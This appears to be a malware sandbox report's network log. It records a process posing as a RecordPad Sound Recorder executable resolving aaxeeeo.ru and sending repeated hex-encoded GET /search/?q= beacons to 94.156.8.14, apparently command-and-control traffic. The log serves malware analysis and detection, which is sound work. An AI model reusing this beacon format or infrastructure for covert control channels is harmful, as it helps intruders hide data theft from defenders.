                                                                                    Jun 11, 2024 19:43:28.284256935 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:29.493206978 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:29.493338108 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:29.603329897 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:29.608414888 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:30.157504082 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:30.157758951 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.286248922 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.286588907 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.291477919 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:30.291565895 CEST805264294.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:30.291580915 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.291611910 CEST5264280192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.304614067 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:30.309468031 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:31.524456024 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:31.524512053 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:31.633411884 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:31.638314962 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:32.155364990 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:32.155417919 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.274090052 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.274386883 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.279283047 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:32.279439926 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.279594898 CEST805264394.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:32.279654026 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.279678106 CEST5264380192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:32.284450054 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:33.444287062 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:33.444401026 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:33.555269957 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:33.560146093 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.038939953 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.039069891 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.149022102 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.153975964 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.623289108 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.623430014 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.742656946 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.742966890 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.748121977 CEST805264594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.748203993 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.748394012 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.748806000 CEST805264494.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:34.748851061 CEST5264480192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:34.753139019 CEST805264594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:35.887119055 CEST805264594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:35.887336969 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.024394035 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.024599075 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.029380083 CEST805264694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:36.029488087 CEST805264594.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:36.029491901 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.029531956 CEST5264580192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.034207106 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:36.039045095 CEST805264694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:37.149792910 CEST805264694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:37.150047064 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.274116993 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.274375916 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.279740095 CEST805264694.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:37.279786110 CEST805264794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:37.279828072 CEST5264680192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.279887915 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.280009985 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:37.284871101 CEST805264794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:38.431476116 CEST805264794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:38.432919979 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.685331106 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.685564995 CEST5264880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.690344095 CEST805264894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:38.690603018 CEST805264794.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:38.690697908 CEST5264780192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.690711975 CEST5264880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.697972059 CEST5264880192.168.2.594.156.8.14
                                                                                    Jun 11, 2024 19:43:38.702832937 CEST805264894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:39.895795107 CEST805264894.156.8.14192.168.2.5
                                                                                    Jun 11, 2024 19:43:39.895946980 CEST5264880192.168.2.594.156.8.14
Jun 11, 2024 19:43:40.008379936 CEST | 52648 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:40.008713007 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:40.013469934 CEST | 80 | 52649 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:40.013586998 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:40.013621092 CEST | 80 | 52648 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:40.013668060 CEST | 52648 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:40.013828039 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:40.018549919 CEST | 80 | 52649 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:41.235439062 CEST | 80 | 52649 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:41.235502005 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:41.366486073 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:41.366800070 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:41.371748924 CEST | 80 | 52650 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:41.371822119 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:41.371967077 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:41.376786947 CEST | 80 | 52650 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:41.381716013 CEST | 80 | 52649 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:41.381776094 CEST | 52649 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.636065960 CEST | 80 | 52650 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:42.636182070 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.757498980 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.757807016 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.762993097 CEST | 80 | 52650 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:42.763010025 CEST | 80 | 52651 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:42.763168097 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.763171911 CEST | 52650 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.763269901 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:42.767936945 CEST | 80 | 52651 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:43.944870949 CEST | 80 | 52651 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:43.944968939 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.070621967 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.070832014 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.076343060 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:44.076442003 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.076445103 CEST | 80 | 52651 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:44.076503038 CEST | 52651 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.076577902 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:44.081928015 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.210340977 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.210501909 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.320897102 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.325783968 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.771339893 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.771450996 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.883479118 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.883874893 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.889041901 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.889149904 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.889178991 CEST | 80 | 52652 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:45.889229059 CEST | 52652 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.889379025 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:45.894237995 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:46.944864035 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:46.944922924 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:47.055363894 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:47.060396910 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:47.475006104 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:47.475065947 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:47.586565971 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:47.591501951 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:48.005105972 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:48.006366014 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.117718935 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.118091106 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.122982979 CEST | 80 | 52654 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:48.123001099 CEST | 80 | 52653 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:48.123083115 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.123111010 CEST | 52653 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.123286963 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:48.128058910 CEST | 80 | 52654 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:49.296906948 CEST | 80 | 52654 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:49.297000885 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.414774895 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.415086985 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.419858932 CEST | 80 | 52655 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:49.419892073 CEST | 80 | 52654 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:49.419954062 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.419982910 CEST | 52654 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.420214891 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:49.424922943 CEST | 80 | 52655 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:50.627034903 CEST | 80 | 52655 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:50.627160072 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.742924929 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.743264914 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.748019934 CEST | 80 | 52656 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:50.748054981 CEST | 80 | 52655 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:50.748102903 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.748120070 CEST | 52655 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.748248100 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:50.761691093 CEST | 80 | 52656 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:52.371663094 CEST | 80 | 52656 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:52.371730089 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.372464895 CEST | 80 | 52656 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:52.372508049 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.477034092 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.477514982 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.482584000 CEST | 80 | 52657 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:52.482675076 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.482820034 CEST | 80 | 52656 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:52.482821941 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.482867002 CEST | 52656 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:52.488879919 CEST | 80 | 52657 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:53.605895042 CEST | 80 | 52657 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:53.605983973 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.731621981 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.731939077 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.736901999 CEST | 80 | 52658 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:53.736974955 CEST | 80 | 52657 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:53.736983061 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.737056971 CEST | 52657 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.737195969 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:53.742044926 CEST | 80 | 52658 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:54.888930082 CEST | 80 | 52658 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:54.889013052 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.010010004 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.010191917 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.015285969 CEST | 80 | 52659 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:55.016422987 CEST | 80 | 52658 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:55.016513109 CEST | 52658 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.016661882 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.016661882 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:55.021524906 CEST | 80 | 52659 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:56.189399958 CEST | 80 | 52659 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:56.189698935 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.307054996 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.307945013 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.312304020 CEST | 80 | 52659 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:56.312532902 CEST | 52659 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.312721968 CEST | 80 | 52660 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:56.312819004 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.313009024 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:56.317755938 CEST | 80 | 52660 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:57.440124035 CEST | 80 | 52660 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:57.441864967 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.588694096 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.588694096 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.593575001 CEST | 80 | 52661 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:57.593770981 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.593794107 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.596528053 CEST | 80 | 52660 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:57.596849918 CEST | 52660 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:57.598824024 CEST | 80 | 52661 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:58.732775927 CEST | 80 | 52661 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:58.732857943 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.867955923 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.868520975 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.873164892 CEST | 80 | 52661 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:58.873226881 CEST | 52661 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.873325109 CEST | 80 | 52662 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:43:58.873390913 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.873533964 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:43:58.878283978 CEST | 80 | 52662 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:00.119187117 CEST | 80 | 52662 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:00.119291067 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.274878025 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.275182009 CEST | 52663 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.279987097 CEST | 80 | 52663 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:00.280107975 CEST | 52663 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.280155897 CEST | 80 | 52662 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:00.280229092 CEST | 52662 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.280297995 CEST | 52663 | 80 | 192.168.2.5 | 94.156.8.14
Jun 11, 2024 19:44:00.285007000 CEST | 80 | 52663 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:01.524300098 CEST | 80 | 52663 | 94.156.8.14 | 192.168.2.5
Jun 11, 2024 19:44:01.525908947 CEST | 52663 | 80 | 192.168.2.5 | 94.156.8.14
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2024 19:42:17.263564110 CEST | 53 | 51029 | 1.1.1.1 | 192.168.2.5
Jun 11, 2024 19:42:49.843638897 CEST | 64735 | 53 | 192.168.2.5 | 152.89.198.214
Jun 11, 2024 19:42:50.595675945 CEST | 53 | 64735 | 152.89.198.214 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 11, 2024 19:42:49.843638897 CEST | 192.168.2.5 | 152.89.198.214 | 0x46a7 | Standard query (0) | aaxeeeo.ru | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 11, 2024 19:42:50.595675945 CEST | 152.89.198.214 | 192.168.2.5 | 0x46a7 | No error (0) | aaxeeeo.ru | | 94.156.8.14 | A (IP address) | IN (0x0001) | false
                                                                                    • aaxeeeo.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 52618 | 94.156.8.14 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:42:50.648471117 CEST | 317 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:42:52.047190905 CEST | 1044 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 33 34 34 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 35 38 31 64 65 34 36 66 62 38 37 64 32 65 38 31 65 30 31 65 39 61 32 35 64 66 63 35 32 39 31 62 64 64 33 38 32 64 37 63 30 31 34 63 34 31 34 64 65 65 35 63 38 36 35 37 32 65 33 31 34 39 31 38 64 38 34 31 34 32 31 65 30 37 32 34 36 61 66 36 62 66 30 36 30 62 37 33 31 35 36 63 36 66 34 64 30 30 38 63 30 34 38 63 63 37 39 62 31 30 65 66 65 33 30 38 63 33 38 65 63 31 39 62 38 36 37 63 36 35 35 62 31 65 30 34 65 65 64 35 31 37 65 34 62 65 39 33 61 36 35 39 30 33 38 37 39 38 64 66 64 30 66 63 31 65 62 39 33 39 30 33 61 63 64 36 66 39 64 31 66 64 64 34 65 38 64 32 62 62 30 34 37 62 32 65 39 34 31 32 30 65 61 37 62 64 38 66 38 37 39 62 39 38 34 65 65 64 64 34 66 66 38 33 38 63 39 30 38 33 34 35 65 35 39 33 65 65 32 32 63 37 32 30 32 36 37 62 63 65 63 38 64 66 35 38 37 32 35 35 34 66 38 35 64 37 62 32 37 65 30 32 33 35 66 65 39 66 65 65 35 38 39 66 30 33 66 37 62 61 34 65 64 34 63 39 61 38 63 65 35 37 32 32 37 30 [TRUNCATED]
Jun 11, 2024 19:42:54.899607897 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:42:55.545264006 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Tue, 11 Jun 2024 17:42:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    X-Powered-By: PHP/7.4.33
                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e\r\n67b680813008c2\r\n0\r\n\r\n (chunked body: one 0xe = 14-byte chunk carrying "67b680813008c2", then the terminating zero-length chunk; the sandbox's ASCII rendering drops the CR/LF framing, which is why it reads as "e67b680813008c20")


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 52621 | 94.156.8.14 | 80 | 1412 | C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
Timestamp | Bytes transferred | Direction | Data
Jun 11, 2024 19:42:55.670104027 CEST | 325 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1
                                                                                    Host: aaxeeeo.ru
                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jun 11, 2024 19:42:57.040334940 CEST | 902 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx/1.20.1
